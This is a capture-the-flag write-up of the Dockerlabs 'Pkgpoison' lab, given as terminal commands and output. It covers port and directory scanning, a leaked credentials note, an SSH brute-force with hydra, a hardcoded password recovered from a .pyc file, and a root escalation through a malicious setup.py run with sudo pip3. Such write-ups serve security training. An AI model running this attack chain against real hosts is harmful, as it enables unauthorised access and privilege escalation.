Dockerlabs-Pkgpoison

[root@kali] /home/kali/pkgpoison  
❯ nmap 172.17.0.2 -sV -A -p-                                                        
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-31 03:57 EDT
Nmap scan report for 172.17.0.2
Host is up (0.000057s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 2f:87:50:66:15:23:d6:c3:90:3f:ea:8c:a4:4b:b3:ff (RSA)
|   256 d1:35:c1:82:09:e8:c2:c7:cd:98:89:61:c2:6b:14:64 (ECDSA)
|_  256 dd:01:45:ce:bd:a3:05:21:5b:31:4c:2f:df:38:c4:f6 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: 404 Not Found
|_http-server-header: Apache/2.4.41 (Ubuntu)

[root@kali] /home/kali/pkgpoison  
❯ feroxbuster -u 'http://172.17.0.2/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x php,txt   
                                                                                                                                                
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://172.17.0.2/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php, txt]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      272c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      308c http://172.17.0.2/notes => http://172.17.0.2/notes/
200      GET        5l       24w      177c http://172.17.0.2/notes/note.txt
200      GET     5094l    30782w  2832734c http://172.17.0.2/index.png
200      GET       26l       51w      589c http://172.17.0.2/
[####################] - 17s   661647/661647  0s      found:4       errors:3422   
[####################] - 16s   661638/661638  40447/s http://172.17.0.2/ 
[####################] - 0s    661638/661638  330819000/s http://172.17.0.2/notes/ => Directory listing (add --scan-dir-listings to scan) 

[root@kali] /home/kali/pkgpoison  
❯ curl http://172.17.0.2/notes/note.txt                               
Dear developer,
Please remember to change your credentials "dev:developer123" to something stronger.
I've already warned you that weak passwords can get us compromised.

-Admin

[root@kali] /home/kali/pkgpoison  
❯ hydra -l dev -P  /usr/share/wordlists/rockyou.txt ssh://172.17.0.2 -I                                                                       ⏎
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-31 04:01:59
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://172.17.0.2:22/
[22][ssh] host: 172.17.0.2   login: dev   password: computer
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-31 04:02:22

dev@2f7ae8d2f272:/opt/scripts/__pycache__$ ll
total 12
drwxr-xr-x 2 root  root  4096 May 24 20:25 ./
drwxr-xr-x 3 root  root  4096 May 24 21:04 ../
-rw-r--r-- 1 admin admin  274 May 24 20:25 secret.cpython-38.pyc
dev@2f7ae8d2f272:/opt/scripts/__pycache__$ 

dev@2f7ae8d2f272:/opt/scripts/__pycache__$ python3 -m http.server

[root@kali] /home/kali/pkgpoison  
❯ wget 172.17.0.2:8000/secret.cpython-38.pyc
--2025-05-31 04:05:39--  http://172.17.0.2:8000/secret.cpython-38.pyc
Connecting to 172.17.0.2:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 274 [application/x-python-code]
Saving to: ‘secret.cpython-38.pyc’

secret.cpython-38.pyc               100%[===================================================================>]     274  --.-KB/s    in 0s      

2025-05-31 04:05:39 (68.1 MB/s) - ‘secret.cpython-38.pyc’ saved [274/274]

# Visit https://www.lddgo.net/string/pyc-compile-decompile for more information
# Version : Python 3.8


def auth():
    username = 'admin'
    password = 'p@$$w0r8321'
    print('Authenticating...')

admin@2f7ae8d2f272:~$ sudo -l
Matching Defaults entries for admin on 2f7ae8d2f272:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User admin may run the following commands on 2f7ae8d2f272:
    (ALL) NOPASSWD: /usr/bin/pip3 install *

admin@2f7ae8d2f272:~$ TF=$(mktemp -d)
admin@2f7ae8d2f272:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
admin@2f7ae8d2f272:~$ sudo /usr/bin/pip3 install $TF
Processing /tmp/tmp.ZzA2ZH9Ziz
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
#